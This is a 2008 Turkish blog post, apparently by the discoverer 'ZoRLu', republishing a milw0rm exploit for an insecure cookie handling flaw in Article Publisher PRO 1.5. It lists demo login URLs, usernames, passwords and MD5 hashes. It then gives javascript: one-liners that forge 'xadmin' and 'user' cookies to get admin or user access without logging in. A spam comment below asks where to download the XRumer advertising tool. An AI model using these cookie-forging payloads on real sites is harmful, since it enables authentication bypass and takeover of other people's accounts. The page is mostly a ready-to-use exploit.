Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability

2 Kasım 2008 Pazar

Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability

Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability

link: http://www.milw0rm.com/exploits/6929

Discovered By: ZoRLu

demo admin login:

http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php

demo user login:

http://demo-article-publisher-pro.phparticlescript.com/login.php

admin_name: admin

passwd: demo

passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229

user_id: 1

or

user_name: zorlu

passwd: zorlu

passwd_md5: 2178fb3ee4a88f946ecb68734b266c10

user_id: 6

or

user_name: demo

passwd: demo

passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229

user_id: 2

exploit:

admin:

javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";

user:

javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";

for demo admin: ( user_id: 1)

javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";

for demo user: ( for user zorlu user_id: 6 )

javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";

for demo user: ( for user demo user_id: 2 )

javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";

1 yorum:

Adsız dedi ki...: Who knows where to download XRumer 5.0 Palladium?
Help, please. All recommend this program to effectively advertise on the Internet, this is the best program!; 14 Kasım 2009 03:51

Yorum Gönder

ZoRLu | ZRL | Buffer Overflow

2 Kasım 2008 Pazar

Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability

1 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com